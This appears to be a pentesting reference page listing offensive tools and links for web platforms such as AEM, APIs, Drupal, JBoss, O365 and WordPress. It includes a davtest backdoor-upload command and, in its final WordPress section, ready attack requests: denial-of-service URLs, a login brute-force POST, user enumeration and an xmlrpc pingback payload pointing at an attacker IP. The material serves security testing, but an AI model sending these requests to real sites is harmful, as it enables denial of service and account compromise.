Adobe AEM
- aem-hacker - Tools to identify vulnerable Adobe Experience Manager (AEM) webapps.
- aemscan - Adobe Experience Manager Vulnerability Scanner
- https://github.com/emadshanab/Adobe-Experience-Manager/blob/main/aem-paths.txt
- https://resources.infosecinstitute.com/topic/adobe-cq-pentesting-guide-part-1/
- https://www.slideshare.net/0ang3el/hacking-aem-sites
- https://experienceleague.adobe.com/docs/experience-manager-release-information/aem-release-updates/previous-updates/aem-previous-versions.html
Apache Web Server
- apache-users - This Perl script will enumerate the usernames on any system that uses Apache with the UserDir modul
APIs
- https://github.com/shieldfy/API-Security-Checklist
- https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf
- https://hackanythingfor.blogspot.com/2020/07/api-testing-checklist.html
- https://cheatsheetseries.owasp.org/cheatsheets/REST_Assessment_Cheat_Sheet.html
- https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html
- https://pentestbook.six2dez.com/enumeration/webservices/apis
- https://github.com/0xCGonzalo/Golden-Guide-for-Pentesting/tree/master/API%20Security
- https://cheatsheet.haax.fr/web-pentest/attacking_apis/
- https://infosecwriteups.com/31-tips-api-security-pentesting-480b5998b765?gi=4d455b3b778f
- https://github.com/dxa4481/AttackingAndDefendingTheGCPMetadataAPI/blob/master/README.md
- https://github.com/streaak/keyhacks
- https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d - API Endpoint wordlist
- imperva/automatic-api-attack-tool - Imperva's customizable API attack tool takes an API specification as an input, generates and runs attacks that are based on it as an output.
- Astra - Automated Security Testing For REST API's
- OWASP API check - APICheck is an environment for integrating existing HTTP APIs tools and create execution chains easily.
- VX-API - Collection of various WINAPI tricks / features used or abused by Malware
- https://malapi.io/ - Cheatsheet for commands that could be potentially used for malicious activity.
- crAPI - completely ridiculous API (crAPI) will help you to understand the ten most critical API security risks. crAPI is vulnerable by design, but you'll be able to safely run it to educate/train yourself.
- https://github.com/Net-hunter121/API-Wordlist - A wordlist of API names used for fuzzing web application APIs.
- https://github.com/metlo-labs/metlo - Metlo is an open-source API security platform
- Hacking: The next generation - Application Protocol Handlers, pg. 96
For training on APIs and API hacking, please see https://github.com/jassics/security-study-plan/blob/main/api-security-study-plan.md__
API: GraphQL
- InQL - A Burp Extension for GraphQL Security Testing
- https://hackernoon.com/understanding-graphql-part-1-nxm3uv9
- https://graphql.org/learn/introspection/
- https://jondow.eu/practical-graphql-attack-vectors/
- https://lab.wallarm.com/securing-and-attacking-graphql-part-1-overview/
- https://medium.com/@apkash8/graphql-vs-rest-api-model-common-security-test-cases-for-graphql-endpoints-5b723b1468b4
- https://the-bilal-rizwan.medium.com/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696
ASP.NET
- viewgen - a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys
Cloudflare
- cloudflare_enum - Cloudflare DNS Enumeration Tool for Pentesters
Drupal
- Droopscan - plugin-based scanner that aids security researchers in identifying issues with several CMS.
- drupwn - Drupal enumeration & exploitation tool
- https://hackertarget.com/drupal-security-scan/
- Drupal: Reverseshell
Firebase
- Insecure-Firebase-Exploit - A simple Python Exploit to Write Data to Insecure/vulnerable firebase databases! Commonly found inside Mobile Apps. If the owner of the app have set the security rules as true for both "read" & "write" an attacker can probably dump database and write his own data to firebase db.
- Firebase-Extractor - A tool written in python for scraping firebase data
- Pyrebase - A simple python wrapper for the Firebase API.
- https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/
Flask
- Flask-Unsign - Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
Google Web Toolkit
- GWTMap - GWTMap is a tool to help map the attack surface of Google Web Toolkit (GWT) based applications.
.htaccess File
- htshells - htshells is a series of web based attacks based around the .htaccess files. Most of the attacks are centered around two attack categories. Remote code/ command execution and information disclosure.
Java Applets
- Advanced Penetration Testing: Using the Java Applet for Payload Delivery - pg. 31
JavaScript
- JSScanner - Scan JS Files for Endpoints and Secrets
- JSFScan.sh - Automation for javascript recon in bug bounty.
- jshole - A JavaScript components vulnerability scanner, based on RetireJS
- Retire.JS - Burp/ZAP/Maven extension that integrate Retire.js repository to find vulnerable Javascript libraries.
- JSshell - JavaScript reverse/remote shell from XSS
- unmap - Unpack a JavaScript Source Map back into filesystem structure
- JSA - Javascript security analysis (JSA) is a program for javascript analysis during web application security assessment.
- https://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/
JBoss
- jboss-autopwn - This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.
- jexboss - JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool
Jenkins
- pwn_jenkins - Notes about attacking Jenkins servers
- Accenture/jenkins-attack-framework - Project fpr enumerating and attacking Jenkins
- https://pentestbook.six2dez.com/enumeration/webservices/jenkins
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md
Jira
- https://pentestbook.six2dez.com/enumeration/webservices/jira
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md
- jira_scan - A simple remote scanner for Atlassian Jira
Joomla
- JCS - JCS (Joomla Component Scanner) made for penetration testing purpose on Joomla CMS
- Joomscan - OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments.
- juumla - Juumla is a python tool created to identify Joomla version, scan for vulnerabilities and search for config files.
- Joomla: Reverse Shell
JSON Web Tokens
- jwt_tool - A toolkit for testing, tweaking and cracking JSON Web Tokens
- jwt-hack - jwt-hack is tool for hacking / security testing to JWT. Supported for En/decoding JWT, Generate payload for JWT attack and very fast cracking(dict/brutefoce)
- jwt-pwn - Security Testing Scripts for JWT
- https://trustfoundry.net/jwt-hacking-101/
- https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9
- https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/
- https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a
- https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6
Megento
- magescan - Scan a Magento site for information
- https://magescan.com/
- https://github.com/steverobbins/magento-version-identification-php
MSExchange
NGINX
- nginxpwner - Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities.
{% content-ref url="oauth-2.0.md" %} oauth-2.0.md {% endcontent-ref %}
OneLogin - SAML
- SAMLExtractor - A tool that can take a URL or list of URL and prints back SAML consume URL.ex
OWA/O365
- MailSniper - MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an administrator to search the mailboxes of every user in a domain.
- byt3bl33d3r/SprayingToolkit - Scripts to make password spraying attacks against Lync/S4B, OWA & O365 a lot quicker, less painful and more efficient
- o365enum - Enumerate valid usernames from Office 365 using ActiveSync, Autodiscover v1, or office.com login page.
- o365-attack-toolkit - o365-attack-toolkit allows operators to perform oauth phishing attacks.
- http://www.blackhillsinfosec.com/?p=4694 - UserName Recon/Password Spraying
- http://www.blackhillsinfosec.com/?p=5089 - Password Spraying MFA/2FA
- http://www.blackhillsinfosec.com/?p=5330 - Password Spraying/GlobalAddressList
- http://www.blackhillsinfosec.com/?p=5396 - Outlook 2FA Bypass
- https://silentbreaksecurity.com/malicious-outlook-rules/ - Malicious Outlook Rules
- http://www.blackhillsinfosec.com/?p=5465 - Outlook Rules in Action
PHP
Redis
Ruby on Rails
- brakeman - A static analysis security vulnerability scanner for Ruby on Rails applications
SAP
- SAP_RECON - PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)
- https://github.com/shipcod3/mySapAdventures
- https://github.com/emadshanab/SAP-wordlist/blob/main/SAP-wordlist.txt
- https://buddysap.com/list-of-sap-port-used-in-sap-abap-and-java-system/
{% content-ref url="ssl-tls-and-certificates.md" %} ssl-tls-and-certificates.md {% endcontent-ref %}
Virtual Hosts
- virtual-host-discovery - A script to enumerate virtual hosts on a server.
- vhosts-sieve - Searching for virtual hosts among non-resolvable domains
- VHostScan - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, work around wildcards, aliases and dynamic default pages.ex
{% content-ref url="web-application-firewall.md" %} web-application-firewall.md {% endcontent-ref %}
WebDav
davtest - Scan the given WebDAV server
-
$ davtest -move -sendbd auto -url http://$ip:8080/webdav/
cadaver - A command-line WebDAV client for Unix.
-
$ cadaver http://$ip:8080/webdav/
Web Proxies
- https://github.com/GrrrDog/weird_proxies - Reverse proxies cheatsheet
Wordpress - Resources
- WPScan - The Wordpress Vulnerability Scanner
- https://wpsec.com/ - Online Wordpress scanner
- WPScan:WordPress Pentesting Framework
- Wordpress Exploit Framework - A Ruby framework designed to aid in the penetration testing of WordPress systems.
- WPSploit - This repository is designed for creating and/or porting of specific exploits for WordPress using metasploit as exploitation tool.
- xmlrpc-scan - Scan urls or a single URL against XMLRPC wordpress issues.
- wpxploit - Simple Python Script For Performing XMLRPC Dictionary Attack
- plecost - Wordpress finger printer tool, plecost search and retrieve information about the plugins versions installed in Wordpress systems.
- XMLRPC Attacks
- https://kathan19.gitbook.io/howtohunt/cms/wordpress
- WordPress Pentest Lab Setup in Multiple Ways
- Multiple Ways to Crack WordPress login
- WordPress: Reverse Shell
WordPress Common Bugs
- Denial of Service via load-scripts.php
http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter
- Denial of Service via load-styles.php
http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic
- Log files exposed
http://target.com/wp-content/debug.log
- Backup file wp-config exposed
.wp-config.php.swp
wp-config.inc
wp-config.old
wp-config.txt
wp-config.html
wp-config.php.bak
wp-config.php.dist
wp-config.php.inc
wp-config.php.old
wp-config.php.save
wp-config.php.swp
wp-config.php.txt
wp-config.php.zip
wp-config.php.html
wp-config.php~
- Information disclosure wordpress username
http://target.com/?author=1
http://target.com/wp-json/wp/v2/users
http://target.com/?rest_route=/wp/v2/users
- Bruteforce in wp-login.php
POST /wp-login.php HTTP/1.1
Host: target.com
log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
- XSPA in wordpress
POST /xmlrpc.php HTTP/1.1
Host: target.com
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://yourip:port</string></value>
</param><param>
<value>
<string>https://target.com></string>
</value>
</param></params>
</methodCall>
Source: https://github.com/daffainfo/AllAboutBugBounty/blob/master/CMS/WordPress.md
{% embed url="https://youtu.be/sQ4TtFdaiRA" %}